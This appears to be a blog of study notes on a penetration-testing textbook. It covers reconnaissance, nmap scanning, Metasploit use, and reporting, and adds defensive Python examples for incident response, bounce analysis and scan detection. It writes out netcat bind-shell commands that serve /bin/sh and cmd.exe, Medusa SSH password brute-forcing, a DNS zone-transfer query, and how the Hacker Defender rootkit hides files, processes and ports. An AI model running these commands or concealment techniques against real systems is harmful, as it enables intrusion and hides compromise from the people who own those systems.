06 Apr 2018
CHAPTER 7 Post Exploitation and Maintaining Access with Backdoors, Rootkits, and Meterpreter
1、netcat
1、"Chat"
Server: nc -l -p 1337
Client: nc 192.168.18.132 1337
This sets up a plain TCP connection between the two hosts; whatever is typed on one end is sent to the other.
2、Transferring a file
server: nc -l -p 7777 > virus.exe
client: nc 172.16.45.129 7777 < virus.exe
3、Grabbing banner information
nc 192.168.18.132 50001
Type a few characters and look at what the service sends back.
4、Bind and reverse shells
Server:
nc -l -p 12345 -e /bin/sh
nc.exe -L -p 12345 -e c:\Windows\System32\cmd.exe
Client:
nc 192.168.1.1 12345
2、Cryptcat, an encrypted netcat
Use the -k option to change the default key; both ends must be started with the same key.
Server: cryptcat -l -p 5757
Client: cryptcat 192.168.18.132 5757
3、Rootkits - Hacker Defender
Configuration file sections:
[Hidden Table] Any files, directories, or folders listed under this heading will be hidden from the explorer and file manager used by Windows.
[Hidden Processes] Each of the processes listed here will be hidden from the local user when they view currently running processes with the task manager.
[Root Processes] Any programs listed here will be allowed to view and interact with programs on the system, including those listed in the [Hidden Table] and [Hidden Processes] tab.
[Hidden Services] section will hide each of the listed services. Again, when interacting with the task manager, any program listed here will be concealed from the “services” list.
[Hidden RegKeys] section can be used to camouflage each of these keys. You will need to make sure that you list them all in order to avoid detection.
[Hidden RegValues] Entering information here will hide individual values rather than the entire key.
[Startup Run] is a list of programs that will be automatically run once Hacker Defender has been started.
You can use the [Free Space] section to force the computer to “add back” the amount of free space that you used.
If you know of ports that you plan to open, you can list them under the [Hidden Ports] section.
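As an added incident-response example, not code from the book or this post: a small parser that reads a config in the [Section] layout above and turns it into the list of artifacts to hunt for on a host where such a rootkit is suspected. The config text and every name in it are constructed placeholders.

```python
import re

# Constructed sample in the [Section] layout described above; every name is a
# placeholder invented for this example, not a real Hacker Defender default.
SAMPLE_CONFIG = """\
[Hidden Table]
example_hidden.exe
[Hidden Processes]
example_hidden.exe
example_helper.exe
[Hidden Services]
ExampleSvc
[Hidden Ports]
TCP:1337,5757
UDP:53
[Startup Run]
c:\\example\\backdoor.exe
"""

SECTION_RE = re.compile(r"^\[(.+?)\]\s*$")
PORT_RE = re.compile(r"^(TCP|UDP):([\d,]+)$", re.IGNORECASE)

def parse_config(text):
    """Return {section: [entries]} for an INI-style rootkit config."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue  # blank lines carry no entry
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
        elif current is not None:
            sections.setdefault(current, []).append(line)
    return sections

def ir_summary(text):
    """Artifacts an incident responder should hunt for on the compromised host."""
    s = parse_config(text)
    ports = set()
    for entry in s.get("Hidden Ports", []):
        m = PORT_RE.match(entry)
        if m:  # expand 'TCP:1337,5757' into (proto, port) pairs
            ports.update((m.group(1).upper(), int(p)) for p in m.group(2).split(","))
    return {
        "files": sorted(set(s.get("Hidden Table", []))),
        "processes": sorted(set(s.get("Hidden Processes", []))),
        "services": sorted(set(s.get("Hidden Services", []))),
        "ports": sorted(ports),
        "persistence": s.get("Startup Run", []),
    }
```

Everything the rootkit was told to hide is exactly what a responder should check with a tool that does not rely on the live API view of the box (offline disk image, netstat from a boot CD).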
4、Meterpreter
Common commands
CHAPTER 8 Wrapping Up the Penetration Test
1、Executive Summary
The executive summary should be a very brief overview of your major findings.
If vulnerabilities and exploits were discovered, the executive summary needs to focus on explaining how these findings impact the business.
2、Detailed Report
This report will include a comprehensive list of your findings as well as the technical details.
Always present critical findings first.
The idea and use of proof-of-concept screenshots is a powerful tool and should be incorporated into the penetration testing report whenever possible.
Whenever possible, when writing the penetration testing report, you need to include mitigations and suggestions for addressing the issues you discovered.
3、Raw Output
[optional]
4、Note:
If you have agreed to deliver the document electronically, you will need to ensure that the penetration testing report is encrypted and remains confidential until it arrives in the client’s hands.
06 Apr 2018
CHAPTER 4 Exploitation
1、Metasploit, the pentester's workhorse
Basic usage:
msfconsole (run from the shell; it opens the msf> prompt)
msf> search missing_patch_number (or CVE)
msf> use exploit_name_and_path
msf> show payloads
msf> set payload path_to_payload
msf> show options
msf> set option_name desired_option_input
msf> exploit
A good tutorial:
Metasploit Unleashed https://www.offensive-security.com/metasploit-unleashed/
2、Online password cracking against network services
Medusa
medusa -h 192.168.18.132 -u ownedb -P /usr/share/john/password.lst -M ssh
THC Hydra https://www.thc.org/thc-hydra/
05 Apr 2018
CHAPTER 2 Reconnaissance
1、What is reconnaissance?
Reconnaissance, also called information gathering, aims to collect as much detail about the target system as possible. It should be the most time-consuming phase of a penetration test, yet it is often neglected or underrated; many failed penetration tests fail because too little information was gathered up front.
2、Active reconnaissance
Active reconnaissance interacts with the target system directly, for example by mirroring the target website with tools such as HTTrack or wget.
3、Passive reconnaissance
Passive reconnaissance gathers information about the target from third parties and never interacts with the target system directly.
3.1、Search engines
Google Hacking
Basic Google hacking operators:
site:dsu.edu pat engebretson
allintitle:index of
inurl:admin
cache:syngress.com
filetype:pdf
site:dsu.edu filetype:pptx
For a fuller treatment of Google hacking, see:
Google Hacking for Penetration Testers
Google Dorks / Google Hacking Database (GHDB)
Other search engines: Yahoo, Bing, Ask, Dogpile
Newsgroups and bulletin board systems such as UseNet and Google Groups
Support forums, Internet Relay Chat
Social media such as Facebook and Twitter
Job-hunting websites
3.2、E-mail addresses
Tool: The Harvester
3.3、whois
whois on a domain
A whois query on a domain reveals the registrant, the authoritative DNS servers, and similar details.
Command-line tool: whois target_domain
Online lookup: http://www.whois.net
whois on an IP address
A whois query on an IP address reveals the netblock the address belongs to, its owner, and so on. Same tools as above.
3.4、Netcraft for aggregated site information
3.5、Translating between IP addresses and hostnames
host target_hostname
host IP_address
3.6、DNS information
nslookup
nslookup
> server 8.8.8.8
> set type=any
> baidu.com
dig
dig @target_ip
dig @192.168.1.23 example.com -t AXFR
fierce
./fierce.pl -dns trustedsec.com
3.7、E-mail servers
Send an e-mail to the organization with an empty .bat file or a non-malicious .exe file such as calc.exe attached
Analyze the header and body of the rejected (bounced) message
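An added example, not part of the book or this post, of what that analysis looks like in code and, from the defender's side, of what a bounce gives away about the mail path: it parses a constructed non-delivery report with Python's standard email module, lists the relay hops oldest first, pulls out any RFC 1918 addresses that leaked into Received headers, and records the software names mentioned. All hostnames and addresses are invented.

```python
import ipaddress
import re
from email import message_from_string

# Constructed non-delivery report (NDR); every hostname and address is an
# invented placeholder for this example, not real mail infrastructure.
SAMPLE_BOUNCE = """\
Return-Path: <>
Received: from edge.example-target.test (edge.example-target.test [198.51.100.7])
\tby mx.tester.test with ESMTPS id abc123; Thu, 05 Apr 2018 10:00:00 +0000
Received: from internal-mail.corp.example-target.test (unknown [10.1.2.3])
\tby edge.example-target.test (Postfix) with ESMTP id 5F2A3; Thu, 05 Apr 2018 09:59:58 +0000
From: Mail Delivery System <MAILER-DAEMON@example-target.test>
To: tester@tester.test
Subject: Undelivered Mail Returned to Sender
X-Mailer: Example Antivirus Gateway 4.2

Your message was rejected: attachment calc.exe is not allowed.
"""

RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)"
    r"(?:\s+\((?P<rdns>[^\s\[\]]+)?\s*\[(?P<ip>[\d.]+)\]\))?"
    r"\s+by\s+(?P<by>\S+)")
SOFTWARE_RE = re.compile(r"\bby\s+\S+\s+\(([^)]+)\)\s+with\b")
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_internal(ip):
    """True when the address sits in an RFC 1918 range, i.e. it leaked from inside."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)

def analyze_bounce(raw):
    """Summarise what a bounce reveals: relay hops, internal addresses, software."""
    msg = message_from_string(raw)
    hops, software = [], set()
    for value in reversed(msg.get_all("Received", [])):  # oldest hop first
        m = RECEIVED_RE.search(value)
        if m:
            hops.append({k: m.group(k) for k in ("helo", "rdns", "ip", "by")})
        software.update(SOFTWARE_RE.findall(value))
    if msg.get("X-Mailer"):
        software.add(msg["X-Mailer"])
    body_lines = [l for l in msg.get_payload().splitlines() if l.strip()]
    return {
        "hops": hops,
        "internal_ips": sorted(h["ip"] for h in hops if h["ip"] and is_internal(h["ip"])),
        "software": sorted(software),
        "reason": body_lines[0] if body_lines else None,
    }
```

Running this against your own organisation's bounces shows whether the edge relay strips internal Received lines and software banners before they leave; if it does not, the report is what an outsider learns from one rejected attachment.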
3.8、Metadata
MetaGooFil
./metagoofil.py -d syngress.com -t pdf,doc,xls,pptx -n 20 -o files -f results.html
3.9、All-in-one information-gathering tools
ThreatAgent
FOCA
SearchDiggity
Maltego
Robtex
CHAPTER 3 Scanning
1、Pings and ping sweeps
ping
ping target_ip
fping
fping -a -g 172.16.45.1 172.16.45.254 > hosts.txt
2、Port and service scanning
nmap
nmap -sT -p- -Pn 192.168.18.132
nmap -sT -p- -Pn 192.168.18.1-254
nmap -sS -p- -Pn 192.168.18.132
nmap -sU 192.168.18.132
nmap -sUV 172.16.45.135
nmap -sX -p- -Pn 192.168.18.132
nmap -sN -p- -Pn 192.168.18.132
nmap --script banner 192.168.18.132
nmap --script vuln 192.168.18.132
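An added, defender-side example that is not from the book or this post: the TCP flag combinations behind -sX (FIN, PSH, URG), -sN (no flags) and -sS/-sT (a SYN to each probed port) are distinctive, so a few lines of Python can pick these scans out of connection records. The five-column log format and the scanning addresses are constructed for the example; the target address is the one used in the commands above.

```python
from collections import defaultdict

# Constructed packet summaries (timestamp, src, dst, dst port, TCP flags) in a
# made-up 5-column format, not real capture output. Flag letters follow the
# tcpdump convention: S=SYN A=ACK F=FIN P=PSH U=URG R=RST, '.' = no flags.
SAMPLE_LOG = """\
1523000001 192.168.18.50 192.168.18.132 21 S
1523000001 192.168.18.50 192.168.18.132 22 S
1523000001 192.168.18.50 192.168.18.132 23 S
1523000001 192.168.18.50 192.168.18.132 25 S
1523000002 192.168.18.50 192.168.18.132 80 S
1523000002 192.168.18.50 192.168.18.132 443 S
1523000005 192.168.18.77 192.168.18.132 80 FPU
1523000005 192.168.18.77 192.168.18.132 443 FPU
1523000006 192.168.18.88 192.168.18.132 80 .
1523000010 192.168.18.10 192.168.18.132 443 S
1523000010 192.168.18.10 192.168.18.132 443 A
"""

XMAS, NULL, SYN = frozenset("FPU"), frozenset(), frozenset("S")
# No normal TCP stack sends these combinations, so even one packet is suspicious.
ODD_FLAGS = {XMAS: "xmas scan (-sX)", NULL: "null scan (-sN)"}

def parse_flags(token):
    """'.' means no flags set; otherwise each letter is one flag."""
    return frozenset() if token == "." else frozenset(token)

def detect_scans(log, port_threshold=5):
    """Map each suspicious source to the kinds of scan it appears to be running."""
    syn_ports, odd = defaultdict(set), defaultdict(set)
    for line in log.splitlines():
        if not line.strip():
            continue
        _ts, src, _dst, dport, flags = line.split()
        fl = parse_flags(flags)
        if fl in ODD_FLAGS:
            odd[src].add(ODD_FLAGS[fl])
        elif fl == SYN:
            syn_ports[src].add(int(dport))  # SYN to many ports = -sS/-sT probing
    findings = {}
    for src in set(syn_ports) | set(odd):
        kinds = set(odd[src])
        if len(syn_ports[src]) >= port_threshold:
            kinds.add("syn/connect scan over %d ports" % len(syn_ports[src]))
        if kinds:
            findings[src] = sorted(kinds)
    return findings
```

The ordinary client at the end (one SYN, then ACKs) is left alone, which is the point of the per-source port threshold: a SYN on its own is how every legitimate connection starts.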
3、Vulnerability Scanning
Nessus https://www.tenable.com/downloads/nessus
4、Other scanning tools
OpenVAS
NeXpose
Metasploit
Core Impact
Canvas
05 Apr 2018
CHAPTER 1 What is Penetration Testing?
1、What is penetration testing?
Penetration testing can be defined as a legal and authorized attempt to locate and successfully exploit computer systems for the purpose of making those systems more secure.
Penetration testing attacks and breaks into systems to uncover their security weaknesses and helps the owner fix them, so that the systems become more secure. It is a legal, authorized form of network attack.
2、The techniques, methods and tools of penetration testing are the same ones real attackers use.
The general idea is to find security issues by using the same tools and techniques as an attacker.
3、Terms used interchangeably with penetration testing
Pen testing
PT
Hacking
Ethical hacking
White hat hacking
Offensive security
Red teaming
4、What separates white hats from black hats?
At its core, these differences can be boiled down to three key points: authorization, motivation, and intent.
5、White-box versus black-box testing
White box penetration testing, also known as “overt” testing, is very thorough and comprehensive.
In white-box testing the client supplies detailed information about the target, such as the network topology, server configuration and application source code, and the tester searches for security problems on the basis of that information.
Black box penetration testing, also known as “covert” testing, employs a significantly different strategy.
In black-box testing the tester knows almost nothing about the target, perhaps only the company name or a single domain name; everything else has to be gathered by the tester. This more closely resembles a real-world attack.
6、The penetration testing process
Many mature penetration testing methodologies exist and they differ only in detail. This book boils the process down to four steps, as follows:
These steps are not simply carried out once in linear order; as the test progresses and deepens they are repeated in a cycle, as follows: